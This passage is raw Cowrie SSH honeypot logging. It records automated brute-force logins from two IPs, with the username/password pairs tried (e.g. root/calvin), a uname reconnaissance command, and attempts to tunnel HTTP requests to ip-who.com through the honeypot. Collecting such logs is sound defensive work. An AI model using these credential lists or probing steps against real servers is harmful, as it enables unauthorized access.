{"eventid":"cowrie.login.success","username":"root","password":"123321","message":"login attempt [root/123321] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:52:28.956804Z","src_ip":"212.227.125.160","session":"2c959f1d547a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:52:29.349754Z","src_ip":"212.227.125.160","session":"2c959f1d547a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:52:29.350410Z","src_ip":"212.227.125.160","session":"2c959f1d547a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:52:29.351954Z","src_ip":"212.227.125.160","session":"205f7f9b494f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:52:29.352664Z","src_ip":"212.227.125.160","session":"205f7f9b494f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:29.539181Z","src_ip":"212.227.125.160","session":"2c959f1d547a"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:29.540288Z","src_ip":"212.227.125.160","session":"2c959f1d547a"}
{"eventid":"cowrie.login.success","username":"root","password":"calvin","message":"login attempt [root/calvin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:52:29.620537Z","src_ip":"212.227.235.229","session":"b7528017f201"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T04:52:30.534474Z","session":"b7528017f201"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:52:31.488336Z","src_ip":"212.227.235.229","session":"b7528017f201"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:32.277243Z","src_ip":"212.227.235.229","session":"b7528017f201"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47244,"dst_ip":"1.2.3.4","dst_port":22,"session":"55a3411147e8","protocol":"ssh","message":"New connection: 212.227.235.229:47244 (1.2.3.4:22) [session: 55a3411147e8]","sensor":"my-vps","timestamp":"2025-08-31T04:52:36.405465Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:52:36.744671Z","src_ip":"212.227.235.229","session":"55a3411147e8"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:52:38.296946Z","src_ip":"212.227.235.229","session":"55a3411147e8"}
{"eventid":"cowrie.login.success","username":"root","password":"1","message":"login attempt [root/1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:52:40.011288Z","src_ip":"212.227.235.229","session":"55a3411147e8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T04:52:40.363753Z","session":"55a3411147e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59360,"dst_ip":"1.2.3.4","dst_port":22,"session":"29c18f9aa69f","protocol":"ssh","message":"New connection: 212.227.235.229:59360 (1.2.3.4:22) [session: 29c18f9aa69f]","sensor":"my-vps","timestamp":"2025-08-31T04:52:41.356283Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:52:41.356950Z","src_ip":"212.227.235.229","session":"29c18f9aa69f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:52:41.480927Z","src_ip":"212.227.235.229","session":"29c18f9aa69f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:52:41.956192Z","src_ip":"212.227.235.229","session":"55a3411147e8"}
{"eventid":"cowrie.login.failed","username":"moodle","password":"123@qwe","message":"login attempt [moodle/123@qwe] failed","sensor":"my-vps","timestamp":"2025-08-31T04:52:42.014209Z","src_ip":"212.227.235.229","session":"29c18f9aa69f"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:43.135124Z","src_ip":"212.227.235.229","session":"29c18f9aa69f"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:43.140136Z","src_ip":"212.227.235.229","session":"55a3411147e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42770,"dst_ip":"1.2.3.4","dst_port":22,"session":"235bc6d6715e","protocol":"ssh","message":"New connection: 212.227.125.160:42770 (1.2.3.4:22) [session: 235bc6d6715e]","sensor":"my-vps","timestamp":"2025-08-31T04:52:44.274692Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:52:44.275568Z","src_ip":"212.227.125.160","session":"235bc6d6715e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:52:44.457645Z","src_ip":"212.227.125.160","session":"235bc6d6715e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-31T04:52:45.005748Z","src_ip":"212.227.125.160","session":"235bc6d6715e"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:46.190972Z","src_ip":"212.227.125.160","session":"235bc6d6715e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36758,"dst_ip":"1.2.3.4","dst_port":22,"session":"a83ebfb22140","protocol":"ssh","message":"New connection: 212.227.235.229:36758 (1.2.3.4:22) [session: a83ebfb22140]","sensor":"my-vps","timestamp":"2025-08-31T04:52:47.188269Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59664,"dst_ip":"1.2.3.4","dst_port":22,"session":"f19143344446","protocol":"ssh","message":"New connection: 212.227.235.229:59664 (1.2.3.4:22) [session: f19143344446]","sensor":"my-vps","timestamp":"2025-08-31T04:52:47.327429Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:52:47.328367Z","src_ip":"212.227.235.229","session":"f19143344446"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:52:47.585603Z","src_ip":"212.227.235.229","session":"f19143344446"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38558,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b519fdf652d","protocol":"ssh","message":"New connection: 212.227.235.229:38558 (1.2.3.4:22) [session: 0b519fdf652d]","sensor":"my-vps","timestamp":"2025-08-31T04:52:48.029366Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":13836,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c6e188a7571","protocol":"ssh","message":"New connection: 212.227.235.229:13836 (1.2.3.4:22) [session: 9c6e188a7571]","sensor":"my-vps","timestamp":"2025-08-31T04:52:48.236340Z"}
{"eventid":"cowrie.login.failed","username":"aa","password":"1234","message":"login attempt [aa/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T04:52:48.647761Z","src_ip":"212.227.235.229","session":"f19143344446"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:52:48.788334Z","src_ip":"212.227.235.229","session":"0b519fdf652d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:52:48.789118Z","src_ip":"212.227.235.229","session":"0b519fdf652d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T04:52:49.310349Z","src_ip":"212.227.235.229","session":"9c6e188a7571"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T04:52:49.413807Z","src_ip":"212.227.235.229","session":"9c6e188a7571"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49420,"dst_ip":"1.2.3.4","dst_port":22,"session":"172607642496","protocol":"ssh","message":"New connection: 212.227.125.160:49420 (1.2.3.4:22) [session: 172607642496]","sensor":"my-vps","timestamp":"2025-08-31T04:52:49.525565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:52:49.526642Z","src_ip":"212.227.125.160","session":"172607642496"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:52:49.713622Z","src_ip":"212.227.125.160","session":"172607642496"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:49.904941Z","src_ip":"212.227.235.229","session":"f19143344446"}
{"eventid":"cowrie.login.failed","username":"admin","password":"ZZ8807zpl","message":"login attempt [admin/ZZ8807zpl] failed","sensor":"my-vps","timestamp":"2025-08-31T04:52:49.913739Z","src_ip":"212.227.235.229","session":"9c6e188a7571"}
{"eventid":"cowrie.login.failed","username":"kubernetes","password":"kubernetes","message":"login attempt [kubernetes/kubernetes] failed","sensor":"my-vps","timestamp":"2025-08-31T04:52:50.286816Z","src_ip":"212.227.125.160","session":"205f7f9b494f"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam123","message":"login attempt [steam/steam123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:52:50.461508Z","src_ip":"212.227.125.160","session":"172607642496"}
{"eventid":"cowrie.login.failed","username":"admin","password":"youandme","message":"login attempt [admin/youandme] failed","sensor":"my-vps","timestamp":"2025-08-31T04:52:51.019519Z","src_ip":"212.227.235.229","session":"9c6e188a7571"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:52:51.650180Z","src_ip":"212.227.125.160","session":"172607642496"}
{"eventid":"cowrie.login.failed","username":"admin","password":"ynot","message":"login attempt [admin/ynot] failed","sensor":"my-vps","timestamp":"2025-08-31T04:52:52.126734Z","src_ip":"212.227.235.229","session":"9c6e188a7571"}
{"eventid":"cowrie.login.failed","username":"admin","password":"yfnfitymrf","message":"login attempt [admin/yfnfitymrf] failed","sensor":"my-vps","timestamp":"2025-08-31T04:52:53.233088Z","src_ip":"212.227.235.229","session":"9c6e188a7571"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:52:54.236099Z","src_ip":"212.227.235.229","session":"a83ebfb22140"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-